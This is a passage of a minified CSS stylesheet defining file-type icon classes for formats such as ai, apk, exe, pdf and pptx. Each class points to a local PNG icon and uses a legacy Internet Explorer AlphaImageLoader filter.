\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');}.x-air{background-image:url("../../../images/file_icon/icon_file/air.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');}.x-arj{background-image:url("../../../images/file_icon/icon_file/arj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');}.x-apk{background-image:url("../../../images/file_icon/icon_file/apk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');}.x-as{background-image:url("../../../images/file_icon/icon_file/as.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');}.x-ascx{background-image:url("../../../images/file_icon/icon_file/ascx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');}.x-ashx{background-image:url("../../../images/file_icon/icon_file/ashx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');}.x-asmx{background-image:url("../../../images/file_icon/icon_file/asmx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');}.x-aspx{background-image:url("../../../images/file_icon/icon_file/aspx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');}.x-bz2{background-image:url("../../../images/file_icon/icon_file/bz2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');}.x-cdr{background-image:url("../../../images/file_icon/icon_file/cdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');}.x-cer{background-image:url("../../../images/file_icon/icon_file/cer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');}.x-chm{background-image:url("../../../images/file_icon/icon_file/chm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');}.x-cmd{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-c{background-image:url("../../../images/file_icon/icon_file/c.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');}.x-cpp{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-cs{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-cshtml{background-image:url("../../../images/file_icon/icon_file/cshtml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');}.x-csproj{background-image:url("../../../images/file_icon/icon_file/csproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');}.x-css{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-csv{background-image:url("../../../images/file_icon/icon_file/csv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');}.x-djvu{background-image:url("../../../images/file_icon/icon_file/djvu.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');}.x-dll{background-image:url("../../../images/file_icon/icon_file/dll.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');}.x-dng{background-image:url("../../../images/file_icon/icon_file/dng.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');}.x-dmg,.x-img{background-image:url("../../../images/file_icon/icon_file/dmg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');}.x-doc,.x-wps{background-image:url("../../../images/file_icon/icon_file/doc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');}.x-docm{background-image:url("../../../images/file_icon/icon_file/docm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');}.x-docx{background-image:url("../../../images/file_icon/icon_file/docx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');}.x-dot{background-image:url("../../../images/file_icon/icon_file/dot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');}.x-dotm{background-image:url("../../../images/file_icon/icon_file/dotm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');}.x-dotx{background-image:url("../../../images/file_icon/icon_file/dotx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');}.x-dtd{background-image:url("../../../images/file_icon/icon_file/dtd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');}.x-eps{background-image:url("../../../images/file_icon/icon_file/eps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');}.x-epub{background-image:url("../../../images/file_icon/icon_file/epub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');}.x-exe{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-f{background-image:url("../../../images/file_icon/icon_file/f.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-fla{background-image:url("../../../images/file_icon/icon_file/fla.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');}.x-font{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-gif{background-image:url("../../../images/file_icon/icon_file/gif.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');}.x-gz{background-image:url("../../../images/file_icon/icon_file/gz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');}.x-h{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-hdr{background-image:url("../../../images/file_icon/icon_file/hdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');}.x-hlp{background-image:url("../../../images/file_icon/icon_file/hlp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');}.x-html{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-indd{background-image:url("../../../images/file_icon/icon_file/indd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');}.x-ini{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-ipa{background-image:url("../../../images/file_icon/icon_file/ipa.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');}.x-jar{background-image:url("../../../images/file_icon/icon_file/jar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');}.x-java{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-jpg{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-js{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-json{background-image:url("../../../images/file_icon/icon_file/json.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');}.x-key{background-image:url("../../../images/file_icon/icon_file/key.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');}.x-ldf{background-image:url("../../../images/file_icon/icon_file/ldf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');}.x-lnk{background-image:url("../../../images/file_icon/icon_file/lnk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');}.x-makefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-mdb{background-image:url("../../../images/file_icon/icon_file/mdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');}.x-mdf{background-image:url("../../../images/file_icon/icon_file/mdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');}.x-mht{background-image:url("../../../images/file_icon/icon_file/mht.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');}.x-midi{background-image:url("../../../images/file_icon/icon_file/midi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');}.x-mpp{background-image:url("../../../images/file_icon/icon_file/mpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');}.x-mpt{background-image:url("../../../images/file_icon/icon_file/mpt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');}.x-msg{background-image:url("../../../images/file_icon/icon_file/msg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');}.x-msi{background-image:url("../../../images/file_icon/icon_file/msi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');}.x-numbers{background-image:url("../../../images/file_icon/icon_file/numbers.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');}.x-odp{background-image:url("../../../images/file_icon/icon_file/odp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');}.x-ods{background-image:url("../../../images/file_icon/icon_file/ods.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');}.x-odt{background-image:url("../../../images/file_icon/icon_file/odt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');}.x-oexe{background-image:url("../../../images/file_icon/icon_file/oexe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');}.x-oexe2{background-image:url("../../../images/file_icon/icon_file/oexe2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');}.x-ogg{background-image:url("../../../images/file_icon/icon_file/ogg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');}.x-pages{background-image:url("../../../images/file_icon/icon_file/pages.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');}.x-pdb{background-image:url("../../../images/file_icon/icon_file/pdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');}.x-pdf{background-image:url("../../../images/file_icon/icon_file/pdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');}.x-php{background-image:url("../../../images/file_icon/icon_file/php.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');}.x-pkg{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-pl{background-image:url("../../../images/file_icon/icon_file/pl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');}.x-png{background-image:url("../../../images/file_icon/icon_file/png.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');}.x-pps{background-image:url("../../../images/file_icon/icon_file/pps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');}.x-ppsx{background-image:url("../../../images/file_icon/icon_file/ppsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');}.x-ppt{background-image:url("../../../images/file_icon/icon_file/ppt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');}.x-pptx{background-image:url("../../../images/file_icon/icon_file/pptx.png");background-image:none 